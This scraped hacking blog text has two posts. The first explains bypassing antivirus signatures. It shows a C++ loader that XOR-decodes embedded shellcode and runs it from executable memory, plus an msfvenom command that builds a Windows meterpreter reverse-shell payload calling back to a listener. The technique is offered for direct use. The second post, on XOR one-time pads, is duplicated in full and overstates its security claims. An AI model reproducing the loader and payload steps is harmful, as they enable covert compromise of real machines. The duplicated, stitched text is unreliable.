So the other day I was messing about and stumbled across this link Bypassing AV with 10 lines The author does a really good job and I suggest reading it. Basically to sum it up If you generate shellcode you can XOR it with a random key and then compile and you wont get flagged. That's not to say the heuristics wont pick you up, but the signatures sure wont! Anyways the compile code looks something like this.
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {char b[] = {0x34,0xa8,0x47 --SNIP--};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 0x89 ;}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
It works great, and all we have to do is xor our code, format it properly and put it in there. If you read my last post youll realize that xor'ing is super super simple. But I decided to whip up a little script so I could do it on the fly.
You can find it here https://github.com/trump0dump/helpful/blob/master/xor_shellcode.py its really very simple.
You start by generating your shellcode with something like so.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f hex > shell_code
That will output into a file formatted like this.
bd21ce1d21ddc2d9 --SNIP-- 59b7683
We then read that file, xor each byte format it and output it into our file to be compiled.
Simple, Sweet, and Easy.
Monday, March 21, 2016
Sunday, March 13, 2016
Grow your own crypto...
I missed posting last week but I had some personal stuff I had to take care of. Ive been doing a bunch of stuff with csharp and crypto lately. Its funny because I don't actually like messing with crypto but sometimes when you know you have a good idea you gotta run with it!
Before I continue I just want to say a quick little something as I'm pretty sure this post is going to put me on yet another list. There is a major difference between having someone with a ts watching everything you do and some jerk-off in your local police department doing it, or for that matter the fbi, and yes I know and understand not all of you/them are the same :) I think this is the reason the fbi v apple case bothers so many of us tech people.
So with that out of the way lets discuss one time pads.. I actually had this idea years ago and what I wanted to do was disconnect a computer and print out 2 copy's of say 20 pages, I could then hand one copy off to whoever I wanted and call them up, I could say anything I wanted and as long as I burned the page afterwards no one would ever be able to figure it out. But what is a onetime pad you are asking... well its really very very simple.
A || a = 192 | b = 100 | c = 32 | d = 10 | etc..
B || a = 120 | b = 36 | c = 255 | d = 95 | etc..
C || a = 3 | b = 1 | c = 33 | d = 7 | etc..
etc..
Now you fill up a entire sheet and as long as you don't use the same thing twice its unbreakable, otherwise you become vulnerable to statistical analysis. So I simply call my mom tell her to go to page 37 and then say b-36, c-3,a-10,c-7,a-192,b-95 and she reads off "BadDad" if we are both careful to burn the page afterwards there is no possible way for the message to be broken... this is what spies use. (btw these numbers don't mean anything sorry lol)
Lets say I wanted to do the same thing but digitally, something that would enable me to write out a pad to a disk give it to my buddy at the next Con we go to and then send them any new script or 0day remotely via whatever means. This is actually a very simple thing to do and its so simple that its utterly scary when you think about it. There is no possible way to backdoor it, and no possible way to break it other than the rubber hose attack. Especially if I have good opsec when generating, storing and transferring the pad. This btw is how most crypto is broken or defeated!!
The one issue and really the only issue that we are going to have is generating truly random numbers, I don't want to get sidetracked but this is honestly allot bigger issue than anyone realizes. If you want a example take a look at the global consciousness project and then.. zomg.. the matrix is real!
Anyways to make a basic pad all we need to do is this.
from Crypto import Random
rndfile = Random.new()
key = rndfile.read(8092)
This will generate a 8092byte key and as long as our msg is under that we are good to go, but how do you actually encrypt it you might ask. The answer to that is super simple, we just XOR it.
unbreakable = ""
for i in range(len(msg)):
unbreakable += chr(ord(msg[i]) ^ ord(key[i]))
To get the msg back out we simply reverse it for instance.
decrypted = ""
for i in range(len(unbreakable)):
decrypted += chr(ord(unbreakable[i]) ^ ord(key[i]))
So in reality "unbreakable" crypto is possible in as little as 6 lines of code... This is your o-shit moment.
The code I have uses that same thing but I also thought maybe I would want to send more than one msg, or maybe my friend would want to send something back. So what we do is generate a bunch of pads, all at ever increasing sizes "because im not sure how big the msg might be". That can be accomplished like so.
count = 100
padsize = 1024
out_bytes = ""
for i in range(count):
out_bytes += rndfile.read(padsize * i)
I can then tell him to use pad number 37 and as long as my msg is under 37888bytes long he simply xor's what I sent him and gets the decrypted content (37 * 1024 = 37888).
Anyways I think that's enough from me for now, and I have more important things to play with so you can find the code here. https://github.com/trump0dump/helpful/blob/master/one_time_pad.py
tl;dr
xor is unbreakable when using truly random numbers
And this is it in action...
Before I continue I just want to say a quick little something as I'm pretty sure this post is going to put me on yet another list. There is a major difference between having someone with a ts watching everything you do and some jerk-off in your local police department doing it, or for that matter the fbi, and yes I know and understand not all of you/them are the same :) I think this is the reason the fbi v apple case bothers so many of us tech people.
So with that out of the way lets discuss one time pads.. I actually had this idea years ago and what I wanted to do was disconnect a computer and print out 2 copy's of say 20 pages, I could then hand one copy off to whoever I wanted and call them up, I could say anything I wanted and as long as I burned the page afterwards no one would ever be able to figure it out. But what is a onetime pad you are asking... well its really very very simple.
A || a = 192 | b = 100 | c = 32 | d = 10 | etc..
B || a = 120 | b = 36 | c = 255 | d = 95 | etc..
C || a = 3 | b = 1 | c = 33 | d = 7 | etc..
etc..
Now you fill up a entire sheet and as long as you don't use the same thing twice its unbreakable, otherwise you become vulnerable to statistical analysis. So I simply call my mom tell her to go to page 37 and then say b-36, c-3,a-10,c-7,a-192,b-95 and she reads off "BadDad" if we are both careful to burn the page afterwards there is no possible way for the message to be broken... this is what spies use. (btw these numbers don't mean anything sorry lol)
Lets say I wanted to do the same thing but digitally, something that would enable me to write out a pad to a disk give it to my buddy at the next Con we go to and then send them any new script or 0day remotely via whatever means. This is actually a very simple thing to do and its so simple that its utterly scary when you think about it. There is no possible way to backdoor it, and no possible way to break it other than the rubber hose attack. Especially if I have good opsec when generating, storing and transferring the pad. This btw is how most crypto is broken or defeated!!
The one issue and really the only issue that we are going to have is generating truly random numbers, I don't want to get sidetracked but this is honestly allot bigger issue than anyone realizes. If you want a example take a look at the global consciousness project and then.. zomg.. the matrix is real!
Anyways to make a basic pad all we need to do is this.
from Crypto import Random
rndfile = Random.new()
key = rndfile.read(8092)
This will generate a 8092byte key and as long as our msg is under that we are good to go, but how do you actually encrypt it you might ask. The answer to that is super simple, we just XOR it.
unbreakable = ""
for i in range(len(msg)):
unbreakable += chr(ord(msg[i]) ^ ord(key[i]))
To get the msg back out we simply reverse it for instance.
decrypted = ""
for i in range(len(unbreakable)):
decrypted += chr(ord(unbreakable[i]) ^ ord(key[i]))
So in reality "unbreakable" crypto is possible in as little as 6 lines of code... This is your o-shit moment.
The code I have uses that same thing but I also thought maybe I would want to send more than one msg, or maybe my friend would want to send something back. So what we do is generate a bunch of pads, all at ever increasing sizes "because im not sure how big the msg might be". That can be accomplished like so.
count = 100
padsize = 1024
out_bytes = ""
for i in range(count):
out_bytes += rndfile.read(padsize * i)
I can then tell him to use pad number 37 and as long as my msg is under 37888bytes long he simply xor's what I sent him and gets the decrypted content (37 * 1024 = 37888).
Anyways I think that's enough from me for now, and I have more important things to play with so you can find the code here. https://github.com/trump0dump/helpful/blob/master/one_time_pad.py
tl;dr
xor is unbreakable when using truly random numbers
And this is it in action...
